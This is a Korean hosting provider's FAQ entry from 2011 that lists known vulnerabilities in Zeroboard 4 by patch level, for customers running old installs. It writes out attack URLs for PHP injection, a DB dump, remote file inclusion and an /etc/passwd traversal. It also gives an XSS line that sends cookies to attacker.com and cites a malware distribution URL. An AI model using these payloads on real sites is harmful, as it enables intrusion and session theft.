내정보 관련
도메인등록
등록정보변경
네임서버
도메인평가/매매
도메인정보조회
한글인터넷주소
웹호스팅
리눅스호스팅
윈도우즈호스팅
서버호스팅
이메일
부가서비스
파킹/포워딩
아사프로
게시판
회원관리
설문조사
접속통계
아사몰
전체보기
게시판
회원관리
설문조사
접속통계
메뉴관리
팝업/배너
웹메일
디자인몰 잦은 질문
CP입점문의
솔루션구매
솔루션기능
사이트관리
솔루션연동
기타
홈페이지몰 잦은 질문
유지보수 잦은질문
서비스요금
카드결제
환불관련
예치금
HOME > 고객지원 > 잦은 질문 > 호스팅 잦은 질문 > 웹호스팅     
LIST DETAIL GALLERY VOTE MODIFY DELETE  
분류 : 웹호스팅  제목: 제로보드4의 취약점은 어떤게 있나요?
글쓴이:호스팅팀 날짜: 2011.07.19. 20:38:56 조회:34462 추천:0 글쓴이IP:
파일:     첨부파일이 없습니다.
[제로보드] 제로보드4 버전별 취약점 정리

버전 정보는 제로보드4 어드민 또는 설치된 디렉토리의 license.txt 에서 확인이 가능합니다.



1.제로보드 4 게시판의 취약성을 이용한 파일 변조
bbs/icon 폴더에 group_qazwsxedc.jpg 파일과 visitLog.php 생성
계정내 확장자가 html, php 파일들에 frame src="악성코드 배포지 URL 삽입 (예: http://h.nexprice.com/css/x.htm)
주로 bbs/폴더내의 파일들에 소스가 삽입됩니다.
계정내 파일들에 iframe 삽입은 없을 수도 있습니다.

제로보드 DB에 zetyx_group_table 생성되고 이 테이블의 header 또는
header_url 에 위 2번과 동일한 악성코드 배포지 URL 생성.



2. login.php 파일의 PHP Injection 취약점 / pl2 이하
login.php?group_no=1을 실행하여 취약점을 확인한 뒤,
login.php?group_no=1&file=[경로]를 호출하여 공격함
ex) login.php?group_no=1&file=test/injection.txt

echo "해킹이 가능합니다.";
?>


3. MySQL DB 덤프 취약점 / pl3 이하
admin_setup.php?_zb_lib_included=true&exec=db_dump&member=1


4. include/write.php 파일의 원격 PHP Injection 취약점 / pl4 이하
05년 호스팅 업체 해킹의 대표적인 사례

echo "";
?>

ex) include/write.php?dir=http://[원격 스크립트 주소]



5. check_user_id.php 파일의 XSS 취약점 / pl4 이하
heck_user_id.php?user_id=<script>alert(document.cookie);</script>

원격지 주소로 쿠키 값을 전송하기
<script> windows.location.href = 'http://attacker.com/write.php?val=' + document:cookie; </script>



6. skin/nzeo_vote/error.php 파일의 원격 PHP Injection 취약점 / pl5 이하
3번과 유사


7. 웹서버의 시스템 파일 노출 취약점 / pl5 이하
_head.php?_zb_path=../../../../etc/passwd%00


8. 정규표현식을 우회한 PHP Injection 취약점 / pl5 이하
정규표현식에 Null 문자() 삽입 시 그 문자까지 만을 정규표현식으로 인식하는 PHP의 특성

9. 비밀게시물을 열람할 수 있는 취약점 / pl6 이하
_member_info_included=1 의 변수를 조작하여 비밀글 열람 가능


10. .htaccess 파일업로드 취약점 / pl7 이하
.htaccess 파일이 업로드가 가능함


11. download.php 의 SQL Injection 취약점 / pl7 이하
download 회수를 paros를 통해 HTTP 헤더를 조작하여 변경할 수 있음


12. 쪽지기능의 XSS 취약점 / pl7 이하
쪽지에 XSS를 넣을경우 상대방에게 XSS가 가능함









LIST DETAIL GALLERY VOTE MODIFY DELETE  


 
전체글:20  방문수:3948690
RELOAD VIEW DEL DETAIL GALLERY
20 관리자모드 암호 변경요청 윤국상2012.05.14. 10:41:1933614
19 제로보드4의 취약점은 어떤게 있나요?호스팅팀2011.07.19. 20:38:5634462
18 홈페이지에 접속하면 바이러스가 있다고 합니다.호스팅팀2009.11.24. 16:05:2415699
17 FTP 접속이 되지 않습니다.호스팅팀2009.11.24. 16:03:5917334
16 호스팅의 용량, 트래픽 등 상위 서비스로 이전하고 싶습니다.호스팅2006.04.12. 16:11:3624643
15 멀티도메인은 어떻게 신청하나요?호스팅2006.04.12. 16:06:3724359
14 트래픽 초과로 사이트가 차단되었습니다.호스팅2006.04.12. 15:47:5625074
13 호스팅 신청 후 내도메인 목록에 표시되지 않습니다.이돈선2006.04.12. 15:32:0524395
12 [JSP] mysql 접속 관련김승진2006.02.13. 10:37:1125904
11 호스팅 명의변경을 하고 싶습니다.호스팅2006.02.07. 16:35:2455654
10 홈페이지에 접속이 되지 않습니다.호스팅2006.02.07. 16:09:0337861
9 한개의 호스팅으로 두 개의 도메인을 운영할 수 있나요?서버관리자2001.07.27. 17:07:0833319
8 타 업체에서 이전하려면 어떻게 해야 하나요?서버관리자2001.07.27. 16:07:1670848
7 회원관리 프로그램을 이용하고 싶습니다.서버관리자2001.07.27. 16:07:1226782
6 네임서버가 변경되기 전에 아이디와 패스워드를 미리 받아볼 수 있나요?서버관리자2001.07.27. 15:07:4324006
5 웹메일은 어떻게 사용하나요?서버관리자2001.07.27. 14:07:4931800
4 e-mail 개수를 추가하려면?서버관리자2001.07.27. 14:07:4624102
3 FTP나 Telnet의 ID/PW를 분실한 경우서버관리자2001.07.27. 14:07:4427046
2 신규 웹호스팅 이용일 경우 신청 방법서버관리자2001.07.21. 14:07:1222545
1 웹호스팅 세팅 절차를 알고 싶습니다.서버관리자2001.07.21. 14:07:0540551
RELOAD VIEW DEL DETAIL GALLERY
      디자인몰 :
          505-054089-13-002
    예금주 : (주)아사달   
    사이트명 : 바다넷 | 회사명 : (주)아사달 | 대표이사 : 서창녕, 심재춘 | 대표전화 : 070-7510-3007 | 팩스번호 : 02-2026-2008
    사업자등록번호 : 206-81-24351 | 법인등록번호 : 110111-1940504 | 통신판매업신고 : 제18-890호 | 벤처확인번호 : 051134532200563
    (우편번호 : 153-803) 서울특별시 금천구 가산동 371-28번지 우림라이온스밸리 A동 8층 (주)아사달
    Copyright ⓒ badanet.co.kr All rights reserved.

    페이지 맨 위로 이동하기